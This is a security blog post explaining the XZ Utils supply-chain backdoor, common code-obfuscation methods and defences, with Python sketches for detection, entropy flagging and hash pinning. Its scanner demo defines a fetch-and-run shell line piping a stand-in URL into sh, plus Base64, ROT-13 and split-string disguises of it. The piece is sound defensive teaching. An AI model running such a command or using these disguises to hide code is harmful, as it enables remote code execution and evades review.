XZ Utils Attack: Combining Social Engineering and Code Obfuscation

What do Social Engineering [CAPEC-403] and Code Obfuscation [T1027.010] have in common? For starters, both are covert techniques that mask an attacker's true intentions. Social engineering hides the malicious intent of a social interaction, while obfuscated code hides the malicious intent of source code. The two techniques can be used independently, but combined they form a powerful one-two punch that attackers commonly rely on: social engineering gets the code into the victim's possession, and code obfuscation makes its malicious intent hard to detect through manual inspection or even with automated cybersecurity tools.

Recently, social engineering and code obfuscation were both part of a supply chain attack against XZ Utils, a compression library used in many Linux distributions, macOS, and, since version 5.0, Microsoft Windows. We have already covered several aspects of social engineering on the Packetlabs blog. In this article we cover the offensive tactic of code obfuscation, list various obfuscation methods and how attackers use them, and briefly review how organizations can protect themselves from both code obfuscation and supply chain attacks.

What Happened In the XZ Hack?

In March 2024, CVE-2024-3094 was published, disclosing malicious code in the liblzma component of XZ Utils with the highest possible CVSS severity score: 10.0 (Critical). According to security advisories, the tampered library could intercept and modify the data handled by any software linked against it, ultimately allowing an attacker to execute arbitrary code.

The backdoor in XZ Utils specifically affects systems running sshd: it hijacks the SSH authentication process when a single specific private key is used. The backdoor was also designed with a kill switch, enabling the attacker to deactivate it remotely.

The discovery came about when Microsoft developer Andres Freund noticed performance issues during SSH logins on Debian sid installations, which led him to investigate further. His inquiry revealed that the upstream tarballs of XZ Utils, specifically versions 5.6.0 and 5.6.1, contained malicious code. An investigation into how this code became part of the XZ Utils package uncovered a sophisticated social engineering attack against the package maintainers, aimed at exploiting the software supply chain. The campaign is believed to have been carried out by a state-sponsored actor who had infiltrated the project over several years.

Beyond creating a sense of urgency to get the malicious code included, the attackers used code obfuscation to hide its intent. At its core, the process was very simple: it extracted specific non-sequential bytes from the user-submitted data and executed them directly as a shell command [CWE-78].
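
The idea of pulling non-sequential bytes out of a larger blob can be illustrated with a small, harmless sketch. This is not the actual XZ Utils payload or extraction logic; the function names `scatter` and `gather`, the fixed stride, and the `echo hello` stand-in are all assumptions made for illustration, and the recovered bytes are only printed, never executed.

```python
import random


def scatter(payload: bytes, stride: int, seed: int = 0) -> bytes:
    """Hide payload in a larger blob: one payload byte, then stride-1 filler bytes."""
    if stride < 2:
        raise ValueError("stride must be at least 2")
    rng = random.Random(seed)
    blob = bytearray()
    for byte in payload:
        blob.append(byte)
        # Filler is drawn from 0x80-0xFF so it never looks like ASCII text.
        blob.extend(rng.randrange(0x80, 0x100) for _ in range(stride - 1))
    return bytes(blob)


def gather(blob: bytes, stride: int) -> bytes:
    """Recover the hidden bytes by reading every stride-th byte."""
    return blob[::stride]


if __name__ == "__main__":
    command = b"echo hello"        # harmless stand-in for a hidden command
    blob = scatter(command, stride=7)
    print(command in blob)         # False: the text never appears contiguously
    print(gather(blob, stride=7))  # b'echo hello' (printed only, never executed)
```

A plain text search of the blob finds nothing, yet a one-line slice recovers the hidden content, which is why opaque binary or "test" data that feeds into a build or runtime step deserves scrutiny.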

Methods Of Code Obfuscation

Code obfuscation (also known as source code obfuscation or command obfuscation) is a cyber attack tactic that hides the true content of source code in order to impede detection by automated tools such as malware scanners or by human reviewers. Ultimately, adversaries want to make malicious software difficult to analyze by encrypting it, encoding it, or obfuscating it in some other way.

Here we will look at specific techniques used to make program code difficult to read:

  • Encoding: Encoding transforms data into a different format, typically using a well-known and easily reversed scheme such as Base64, which converts binary data into ASCII characters, or data compression such as ZIP or GZIP. Encoding makes it harder to find potentially malicious code with simple text-based scanners or manual inspection. The encoded data is usually decoded at runtime, loading the plaintext code into memory where it is executed. Because encoding schemes are easily reversed, some automated Source Code Analysis (SCA) tools look for Base64-encoded strings, decode them, and analyze their contents

  • Encryption: Encryption involves converting data into a secret code to prevent access. This can range from simple encryption methods like ROT-13 (a Caesar cipher with a fixed shift of 13) to more complex algorithms like AES (Advanced Encryption Standard) or RSA (Rivest-Shamir-Adleman) public key encryption. Encrypted data is much harder to decipher without the correct decryption key, providing stronger protection against analysis and detection

  • Complex code style: Deliberately complicating the structure of an application or script is another common technique for confounding security researchers and delaying malware analysis. Meaningless variable names, convoluted logical flow, and unnecessary code with no useful function all make it slower to reverse engineer the code and establish its ultimate purpose

  • Dynamic Execution: This technique involves code that only reveals its true nature or executes under specific conditions or environments. This can prevent analysis tools that do not mimic the end-user environment from seeing the malicious behavior. Dynamic execution might involve checking for the presence of a debugger or virtual machine before executing the malicious activities

  • Use of Compilers and Packers: Packers compress, encrypt, or modify a program’s binary to obscure its contents. Upon execution, the packer code decompresses or decrypts the original executable code in memory, which makes static analysis very difficult. Packers are often used in conjunction with other obfuscation techniques to create layers of obfuscation

  • Dead Code Insertion: Dead code insertion involves adding code that does nothing or is never actually called within the program’s execution path. This can confuse and slow down an analyst or automated tool trying to trace important execution paths or determine the purpose of the code

  • String Obfuscation: String obfuscation involves altering readable strings in the code that might give hints about code functionality. Strings can be encoded, encrypted, or broken into a very large number of smaller parts scattered throughout the codebase. This reduces the likelihood that simple searches within the code will reveal its intent or operation
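
Several of the techniques above (encoding, a simple cipher such as ROT-13, and string splitting) can be sketched in a few lines, along with the kind of normalization a scanner needs before a plain search works again. This is a minimal sketch, not a real scanner: the indicator string `NEEDLE`, the `run(...)` sample snippets, and the helper names are hypothetical.

```python
import base64
import codecs
import re

# Hypothetical indicator string that a reviewer might search for.
NEEDLE = "curl http://example.invalid/x | sh"

BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")  # long Base64-looking runs
LITERAL_JOIN = re.compile(r'"\s*\+\s*"')              # "abc" + "def" boundaries


def naive_scan(source: str, needle: str = NEEDLE) -> bool:
    """Plain substring search, as a simple text-based scanner would do."""
    return needle in source


def deep_scan(source: str, needle: str = NEEDLE) -> bool:
    """Search the source plus a few de-obfuscated views of it."""
    candidates = [
        source,
        LITERAL_JOIN.sub("", source),       # re-join split string literals
        codecs.decode(source, "rot_13"),    # undo ROT-13
    ]
    for match in BASE64_RUN.finditer(source):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
        except ValueError:                  # not valid Base64, skip it
            continue
        candidates.append(raw.decode("utf-8", errors="ignore"))
    return any(needle in text for text in candidates)


def make_samples(needle: str = NEEDLE) -> dict:
    """Build three obfuscated variants of the same (never executed) string."""
    encoded = base64.b64encode(needle.encode()).decode()
    rotated = codecs.encode(needle, "rot_13")
    middle = len(needle) // 2
    return {
        "base64": f'run(b64decode("{encoded}"))',
        "rot13": f'run(rot13("{rotated}"))',
        "split": f'run("{needle[:middle]}" + "{needle[middle:]}")',
    }


if __name__ == "__main__":
    for name, sample in make_samples().items():
        print(name, naive_scan(sample), deep_scan(sample))
```

Each sample defeats the plain substring search but is caught once the matching transformation is undone. Real obfuscation layers these techniques and uses strong encryption, so this kind of normalization only raises the bar for the simplest cases.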

Mitigating The Threat Of Code Obfuscation

To an experienced software engineer, obfuscated code is generally obvious because it violates many good coding practices, such as writing clean, DRY (Don't Repeat Yourself) code. In addition, any sections of encoded, compressed, or encrypted data that are decoded and used by the software should always be inspected to determine what is actually being executed.
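
One rough way to surface embedded blobs for that kind of inspection is to measure the Shannon entropy of string literals, since encoded or encrypted data tends to look more random than ordinary text. The sketch below is a heuristic under stated assumptions: the 40-character minimum and 4.5 bits-per-character threshold are illustrative values to tune, and the regular expression only handles simple double-quoted literals without escapes.

```python
import math
import re
from collections import Counter

# Simple double-quoted literals only: no escapes, no multi-line strings.
SIMPLE_LITERAL = re.compile(r'"([^"\\\n]*)"')


def shannon_entropy(text: str) -> float:
    """Return the Shannon entropy of text in bits per character."""
    if not text:
        return 0.0
    total = len(text)
    counts = Counter(text)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


def flag_literals(source: str, min_length: int = 40, threshold: float = 4.5):
    """Return (literal, entropy) pairs for long, random-looking string literals."""
    flagged = []
    for match in SIMPLE_LITERAL.finditer(source):
        literal = match.group(1)
        if len(literal) >= min_length:
            score = shannon_entropy(literal)
            if score >= threshold:
                flagged.append((literal, score))
    return flagged


if __name__ == "__main__":
    blob = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    source = f'data = "{blob}"\npadding = "{"a" * 50}"\n'
    for literal, score in flag_literals(source):
        print(f"{score:.2f} bits/char: {literal[:24]}...")
```

A flagged literal is not proof of malice, since legitimate keys, hashes, and compressed assets also score high. It is simply a pointer to data that a reviewer should decode and read.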

To effectively counteract the risks posed by code obfuscation, especially in the context of sophisticated software supply chain attacks like the XZ Utils case, organizations can employ a multi-layered security strategy. Here are some key mitigation actions:

  • Rigorous Code Auditing: Regularly conduct thorough code reviews and audits to check for any anomalies or unusual coding patterns that might suggest obfuscation. Utilize automated tools that can detect obfuscated code by analyzing control flow, string literals, and metadata

  • Tracking Software Dependencies: Implement strict monitoring of all software dependencies, including third-party libraries and tools, to detect any unauthorized changes or additions to the code base

  • Secure Development Practices: Train developers on secure coding practices and the risks associated with importing unverified code. Encourage the use of well-known and trusted libraries over less popular alternatives

  • Vendor Risk Management: Establish a robust vendor risk management process that includes the vetting of all contributors to your codebase and maintaining a verified list of contributors, which can help prevent social engineering attacks

  • Patch Management: Ensure timely application of security patches and updates to all software components, reducing the window of opportunity for attackers to exploit known vulnerabilities

  • Integration of Advanced Detection Tools: Use advanced malware detection systems that are capable of identifying obfuscated code by employing machine learning techniques and behavioral analysis to understand the intent behind the code rather than just its appearance
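
As one concrete piece of dependency tracking, a build can refuse to proceed when a vendored artifact no longer matches a previously recorded SHA-256 digest. The following is a minimal sketch using only the Python standard library; the `pins` mapping and the file layout are hypothetical, and in practice package managers' lock files and hash-checking modes typically cover this.

```python
import hashlib
from pathlib import Path


def sha256_of(path: Path) -> str:
    """Return the hex SHA-256 digest of a file, read in chunks."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_pins(pins: dict, root: Path) -> list:
    """Return the names of artifacts that are missing or differ from their pin."""
    mismatches = []
    for name, expected in pins.items():
        artifact = root / name
        if not artifact.is_file() or sha256_of(artifact) != expected.lower():
            mismatches.append(name)
    return mismatches


if __name__ == "__main__":
    import tempfile

    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "libexample.tar.gz").write_bytes(b"original release contents")
        pins = {"libexample.tar.gz": sha256_of(root / "libexample.tar.gz")}
        print(verify_pins(pins, root))   # [] while the artifact is unchanged
        (root / "libexample.tar.gz").write_bytes(b"tampered contents")
        print(verify_pins(pins, root))   # ['libexample.tar.gz'] after a change
```

A pin only detects changes made after it was recorded; it says nothing about whether the pinned artifact was trustworthy to begin with, which is why it complements rather than replaces code review and contributor vetting.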

Conclusion

Many cyber attacks ultimately come down to executing malicious code without authorization in order to achieve the attacker's goals. The combination of social engineering and code obfuscation is an especially common and powerful way to do this, and a formidable one to defend against. The XZ Utils attack highlights how long-term social engineering campaigns can lead to malware being included in the global open-source supply chain. By blending in code obfuscation, attackers increase their chances of success, as busy developers may not take the time to fully assess complex code.

Organizations must recognize the dual threat posed by these techniques and respond with comprehensive security strategies that address both human and technical vulnerabilities. Strengthening code integrity checks, enhancing employee training on social engineering, and employing advanced detection mechanisms are critical to defending against these sophisticated attacks. As the landscape of threats continues to evolve, so too must the defenses that protect our critical software infrastructures.
